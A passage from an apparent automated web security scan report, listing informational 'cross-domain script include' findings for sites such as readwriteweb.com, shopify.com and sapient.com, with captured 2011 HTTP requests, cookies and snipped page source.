http://static.fmpub.net/zone/102
http://static.fmpub.net/zone/1798
http://static.fmpub.net/zone/2000
http://static.fmpub.net/zone/2562
http://static.fmpub.net/zone/636
http://static.fmpub.net/zone/637
http://static.woopra.com/js/woopra.v2.js
http://twitter.com/javascripts/blogger.js
http://twitter.com/statuses/user_timeline/rww.json?callback=twitterCallback2&count=5
http://www.apture.com/js/apture.js?siteToken=H0arRY0
http://www.google.com/jsapi

Request

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:32:49 GMT
Server: Apache/2.x (Hardened)
Last-Modified: Tue, 31 Aug 2010 16:17:53 GMT
ETag: "8f7c-48f20ec4c6e40"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 36732
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

...[SNIP]...
<link rel="start" href="http://www.readwriteweb.com/" title="Home" />

<script src="http://www.google.com/jsapi"></script>
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/readwrite'></script>
...[SNIP]...

<script type="text/javascript" src="http://static.woopra.com/js/woopra.v2.js"></script>
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/zone/637'></script>
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/zone/2562'></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js">
</script>
...[SNIP]...

<script type='text/javascript'
src='http://static.fmpub.net/zone/1798'></script>
...[SNIP]...
</div>
<script type="text/javascript"
src="http://twitter.com/javascripts/blogger.js"></script>
<script type="text/javascript"
src="http://twitter.com/statuses/user_timeline/rww.json?callback=twitterCallback2&count=5"></script>
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/zone/2000'></script>
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/zone/102'></script>
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/zone/101'></script>
...[SNIP]...
</div>
<script type='text/javascript' src='http://static.fmpub.net/zone/636'></script>
...[SNIP]...

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=readwriteweb"></script>
...[SNIP]...
</script>
<script id="aptureScript" type="text/javascript" src="http://www.apture.com/js/apture.js?siteToken=H0arRY0" charset="utf-8"></script>
<script src="http://js-kit.com/comments-count.js"></script>
...[SNIP]...

20.309. http://www.readwriteweb.com/404.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.readwriteweb.com
Path:	/404.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://js-kit.com/comments-count.js
http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js
http://s7.addthis.com/js/250/addthis_widget.js
http://static.fmpub.net/site/readwrite
http://static.fmpub.net/zone/101
http://static.fmpub.net/zone/102
http://static.fmpub.net/zone/1798
http://static.fmpub.net/zone/2000
http://static.fmpub.net/zone/2562
http://static.fmpub.net/zone/636
http://static.fmpub.net/zone/637
http://static.woopra.com/js/woopra.v2.js
http://twitter.com/javascripts/blogger.js
http://twitter.com/statuses/user_timeline/rww.json?callback=twitterCallback2&count=5
http://www.apture.com/js/apture.js?siteToken=H0arRY0
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:56 GMT
Server: Apache/2.x (Hardened)
Last-Modified: Tue, 31 Aug 2010 16:17:53 GMT
ETag: "8f7c-48f20ec4c6e40"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 36732
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

...[SNIP]...
<link rel="start" href="http://www.readwriteweb.com/" title="Home" />

<script src="http://www.google.com/jsapi"></script>
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/readwrite'></script>
...[SNIP]...

<script type="text/javascript" src="http://static.woopra.com/js/woopra.v2.js"></script>
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/zone/637'></script>
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/zone/2562'></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js">
</script>
...[SNIP]...

<script type='text/javascript'
src='http://static.fmpub.net/zone/1798'></script>
...[SNIP]...
</div>
<script type="text/javascript"
src="http://twitter.com/javascripts/blogger.js"></script>
<script type="text/javascript"
src="http://twitter.com/statuses/user_timeline/rww.json?callback=twitterCallback2&count=5"></script>
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/zone/2000'></script>
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/zone/102'></script>
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/zone/101'></script>
...[SNIP]...
</div>
<script type='text/javascript' src='http://static.fmpub.net/zone/636'></script>
...[SNIP]...

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=readwriteweb"></script>
...[SNIP]...
</script>
<script id="aptureScript" type="text/javascript" src="http://www.apture.com/js/apture.js?siteToken=H0arRY0" charset="utf-8"></script>
<script src="http://js-kit.com/comments-count.js"></script>
...[SNIP]...

20.310. http://www.readwriteweb.com/enterprise/2010/11/oracle.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.readwriteweb.com
Path:	/enterprise/2010/11/oracle.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://disqus.com/forums/readwriteenterprise/embed.js
http://platform.linkedin.com/in.js
http://readwriteenterprise.disqus.com/combination_widget.js?num_items=5&hide_mods=0&color=grey&default_tab=people&excerpt_length=200
http://rww.readwriteweb.netdna-cdn.com/mt-static/themes/df/scripts/jw_scripts.js
http://s7.addthis.com/js/250/addthis_widget.js
http://static.fmpub.net/site/readwrite
http://static.fmpub.net/zone/4445
http://static.fmpub.net/zone/4478
http://static.fmpub.net/zone/4479
http://twitter.com/javascripts/blogger.js
http://twitter.com/statuses/user_timeline/CenturyLinkBiz.json?callback=twitterCallback2&count=3
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:43 GMT
Server: Apache/2.x (Hardened)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Content-Length: 43029
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

...[SNIP]...
<link rel="stylesheet" href="http://rww.readwriteweb.netdna-cdn.com/mt-static/themes/df/rww_enterprise.css" type="text/css" />

<script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://rww.readwriteweb.netdna-cdn.com/mt-static/themes/df/scripts/jw_scripts.js"></script>
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/site/readwrite'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://disqus.com/forums/readwriteenterprise/embed.js"></script>
...[SNIP]...
<div class="channel-sponsor-logo" style="margin-bottom: 15px">
<script type="text/javascript" src="http://static.fmpub.net/zone/4478"></script>
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/zone/4445'></script>
...[SNIP]...
</ul>
<script type="text/javascript"
src="http://twitter.com/javascripts/blogger.js"></script>
<script type="text/javascript"
src="http://twitter.com/statuses/user_timeline/CenturyLinkBiz.json?callback=twitterCallback2&count=3"></script>
...[SNIP]...

<script type='text/javascript' src='http://static.fmpub.net/zone/4479'></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://readwriteenterprise.disqus.com/combination_widget.js?num_items=5&hide_mods=0&color=grey&default_tab=people&excerpt_length=200"></script>
...[SNIP]...
</p>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=readwriteweb"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.linkedin.com/in.js"></script>
...[SNIP]...

20.311. http://www.resourcepoint.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resourcepoint.net
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.statcounter.com/counter/counter_xhtml.js

Request

GET / HTTP/1.1
Host: www.resourcepoint.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=188034475.914778929.1315341149.1315341149.1315341149.1; __utmb=188034475.1.10.1315341149; __utmc=188034475; __utmz=188034475.1315341149.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio

Response

20.312. http://www.resourcepoint.net/index.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resourcepoint.net
Path:	/index.htm

Issue detail

The response dynamically includes the following script from another domain:

http://www.statcounter.com/counter/counter_xhtml.js

Request

GET /index.htm HTTP/1.1
Host: www.resourcepoint.net
Proxy-Connection: keep-alive
Referer: http://www.resourcepoint.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=188034475.; __utmxx=188034475.; WT_FPC=id=239e81f8b695866baab1315330543768:lv=1315330543768:ss=1315330543768; __utma=188034475.914778929.1315341149.1315341149.1315341149.1; __utmb=188034475.3.10.1315341149; __utmc=188034475; __utmz=188034475.1315341149.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio

Response

20.313. http://www.sapient.com/en-us/about-sapient/alliances.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sapient.com
Path:	/en-us/about-sapient/alliances.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
https://ads.bridgetrack.com/site/btall_client_src.js?adv=26&site=SAPIENT

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:37:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: locale=en-us; expires=Fri, 16-Sep-2011 15:37:20 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>

<script type="text/javascript" src="https://ads.bridgetrack.com/site/btall_client_src.js?adv=26&site=SAPIENT"></script>
...[SNIP]...

20.314. http://www.sapient.com/en-us/about-sapient/alliances/atg.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sapient.com
Path:	/en-us/about-sapient/alliances/atg.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
https://ads.bridgetrack.com/site/btall_client_src.js?adv=26&site=SAPIENT

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: locale=en-us; expires=Fri, 16-Sep-2011 15:32:31 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>

<script type="text/javascript" src="https://ads.bridgetrack.com/site/btall_client_src.js?adv=26&site=SAPIENT"></script>
...[SNIP]...

20.315. http://www.sapient.com/en-us/about-sapient/corporate-social-responsibility.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sapient.com
Path:	/en-us/about-sapient/corporate-social-responsibility.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
https://ads.bridgetrack.com/site/btall_client_src.js?adv=26&site=SAPIENT

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:35:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: locale=en-us; expires=Fri, 16-Sep-2011 15:35:32 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 32820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>

<script type="text/javascript" src="https://ads.bridgetrack.com/site/btall_client_src.js?adv=26&site=SAPIENT"></script>
...[SNIP]...

20.316. http://www.sapient.com/en-us/search.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sapient.com
Path:	/en-us/search.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/widgets.js
https://ads.bridgetrack.com/site/btall_client_src.js?adv=26&site=SAPIENT

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:37:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: locale=en-us; expires=Fri, 16-Sep-2011 15:37:09 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 20346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</script><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>

<script type="text/javascript" src="https://ads.bridgetrack.com/site/btall_client_src.js?adv=26&site=SAPIENT"></script>
...[SNIP]...

20.317. http://www.shopify.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopify.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://t2.trackalyzer.com/trackalyze.js
http://www.googleadservices.com/pagead/conversion.js

Request

Response

20.318. http://www.shopify.com/admin/auth/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopify.com
Path:	/admin/auth/login

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://cdn.optimizely.com/js/790001.js
http://t2.trackalyzer.com/trackalyze.js
http://use.typekit.com/ghj6ovz.js
http://www.googleadservices.com/pagead/conversion.js

Request

GET /admin/auth/login HTTP/1.1
Host: www.shopify.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _y=76726C16-B1FA-490A-93B3; optimizelyEndUserId=oeu1315341237551r0.5390826954971999; wcsid=4XOE7W6GWNHMEHMYS9583VOC78556641; hblid=JAQBX9FF2NF9W8U5RWCURZAD78556641; optimizelyBuckets=%7B%7D; olarkld=1315341237560; _oklv=1315341659210; __utma=262205262.1105150939.1315341127.1315341127.1315341127.1; __utmb=262205262.11.10.1315341127; __utmc=262205262; __utmz=262205262.1315341127.1.1.utmgclid=CK6YvLv4iKsCFSE8gwod-iiK3g|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=ATG%20e-commerce%20solutio; _s=08DB14DB-F588-4766-8659; __ar_v4=RFYZ2NEPUVBUFENBCOH6GL%3A20110906%3A2%7C4X7ERY5MVFDBLHMTRJRP2G%3A20110906%3A1%7C3CUMSMM7PFGSTPKIXDFOOO%3A20110906%3A3%7CEBPLYDUJ5RCZ3C7MBENLBV%3A20110906%3A3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
X-Rack-Cache: fresh
X-Content-Digest: 38f4c37fa64459e11e554308ab3dd1ee00e72542
X-Runtime: 1645
Cache-Control: public, max-age=300
Server: nginx/0.7.64 + Phusion Passenger 2.2.11 (mod_rails/mod_rack)
X-Cacheable: NO:Not Cacheable
Content-Length: 15660
Date: Tue, 06 Sep 2011 15:41:17 GMT
X-Varnish: 1687908019
Age: 1
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<![endif]-->

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://use.typekit.com/ghj6ovz.js"></script>
...[SNIP]...
</script>

<script src="//cdn.optimizely.com/js/790001.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

20.319. http://www.shopify.com/examples previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopify.com
Path:	/examples

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://cdn.optimizely.com/js/790001.js
http://t2.trackalyzer.com/trackalyze.js
http://use.typekit.com/ghj6ovz.js
http://www.googleadservices.com/pagead/conversion.js

Request

GET /examples HTTP/1.1
Host: www.shopify.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/tour
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _y=76726C16-B1FA-490A-93B3; __ar_v4=%7CEBPLYDUJ5RCZ3C7MBENLBV%3A20110906%3A1%7C3CUMSMM7PFGSTPKIXDFOOO%3A20110906%3A1%7C4X7ERY5MVFDBLHMTRJRP2G%3A20110906%3A1; optimizelyEndUserId=oeu1315341237551r0.5390826954971999; optimizelyBuckets=%7B%7D; __utma=262205262.1105150939.1315341127.1315341127.1315341127.1; __utmb=262205262.5.10.1315341127; __utmc=262205262; __utmz=262205262.1315341127.1.1.utmgclid=CK6YvLv4iKsCFSE8gwod-iiK3g|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=ATG%20e-commerce%20solutio; _s=08DB14DB-F588-4766-8659; olarkld=1315341237560; wcsid=4XOE7W6GWNHMEHMYS9583VOC78556641; _oklv=1315341238987; hblid=JAQBX9FF2NF9W8U5RWCURZAD78556641

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
ETag: "8f7c88edfb0c914b89bc76b6acab2982"
X-Rack-Cache: fresh
X-Content-Digest: b07dc9d86ea310a157a069084b0cda714abd7659
X-Runtime: 2553
Cache-Control: public, max-age=300
Server: nginx/0.7.64 + Phusion Passenger 2.2.11 (mod_rails/mod_rack)
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 19311
Date: Tue, 06 Sep 2011 15:34:06 GMT
X-Varnish: 1687907293 1687907271
Age: 12
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<![endif]-->

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://use.typekit.com/ghj6ovz.js"></script>
...[SNIP]...
</script>

<script src="//cdn.optimizely.com/js/790001.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

20.320. http://www.shopify.com/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopify.com
Path:	/login

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://cdn.optimizely.com/js/790001.js
http://t2.trackalyzer.com/trackalyze.js
http://use.typekit.com/ghj6ovz.js
http://www.googleadservices.com/pagead/conversion.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
ETag: "5e6cd1cceddc58f0b1054bb20da87a2e"
X-Rack-Cache: fresh
X-Content-Digest: 3f0391ebb89e0d08d8add07de6cf12a5cb1d4dee
X-Runtime: 1746
Cache-Control: public, max-age=300
Server: nginx/0.7.64 + Phusion Passenger 2.2.11 (mod_rails/mod_rack)
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 15228
Date: Tue, 06 Sep 2011 15:40:58 GMT
X-Varnish: 1482397443 1482397441
Age: 108
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<![endif]-->

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://use.typekit.com/ghj6ovz.js"></script>
...[SNIP]...
</script>

<script src="//cdn.optimizely.com/js/790001.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

20.321. http://www.shopify.com/tour previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopify.com
Path:	/tour

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://cdn.optimizely.com/js/790001.js
http://t2.trackalyzer.com/trackalyze.js
http://use.typekit.com/ghj6ovz.js
http://www.googleadservices.com/pagead/conversion.js

Request

GET /tour HTTP/1.1
Host: www.shopify.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=262205262.1105150939.1315341127.1315341127.1315341127.1; __utmb=262205262.2.10.1315341127; __utmc=262205262; __utmz=262205262.1315341127.1.1.utmgclid=CK6YvLv4iKsCFSE8gwod-iiK3g|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=ATG%20e-commerce%20solutio; _y=76726C16-B1FA-490A-93B3; _s=08DB14DB-F588-4766-8659; __ar_v4=%7CEBPLYDUJ5RCZ3C7MBENLBV%3A20110906%3A1%7C3CUMSMM7PFGSTPKIXDFOOO%3A20110906%3A1%7C4X7ERY5MVFDBLHMTRJRP2G%3A20110906%3A1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
ETag: "16ce554bcc0e560a6719831237efac75"
X-Rack-Cache: fresh
X-Content-Digest: f28972877127f1924c2d86adc520840168285bb1
X-Runtime: 4033
Cache-Control: public, max-age=300
Server: nginx/0.7.64 + Phusion Passenger 2.2.11 (mod_rails/mod_rack)
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 24792
Date: Tue, 06 Sep 2011 15:33:55 GMT
X-Varnish: 1482396697 1482396684
Age: 150
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<![endif]-->

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://use.typekit.com/ghj6ovz.js"></script>
...[SNIP]...
</script>

<script src="//cdn.optimizely.com/js/790001.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

20.322. http://www.sophelle.com/Success-Stories/Automated-Website-Testing.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/Success-Stories/Automated-Website-Testing.html

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /Success-Stories/Automated-Website-Testing.html HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Success-Stories/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.20.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A31%3A22

Response

HTTP/1.1 200 OK
Content-Length: 9759
Content-Type: text/html
Last-Modified: Tue, 26 Apr 2011 13:17:55 GMT
Accept-Ranges: bytes
ETag: "0bf755a144cc1:957"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:29:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon"
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=bdantz"></script>
...[SNIP]...

20.323. http://www.tenzing.com/atg-ecommerce-hosting.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tenzing.com
Path:	/atg-ecommerce-hosting.asp

Issue detail

The response dynamically includes the following scripts from other domains:

http://t5.trackalyzer.com/trackalyze.js
http://w.sharethis.com/button/buttons.js

Request

Response

20.324. http://www.tenzing.com/cloud/cloud-pricing.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tenzing.com
Path:	/cloud/cloud-pricing.asp

Issue detail

The response dynamically includes the following scripts from other domains:

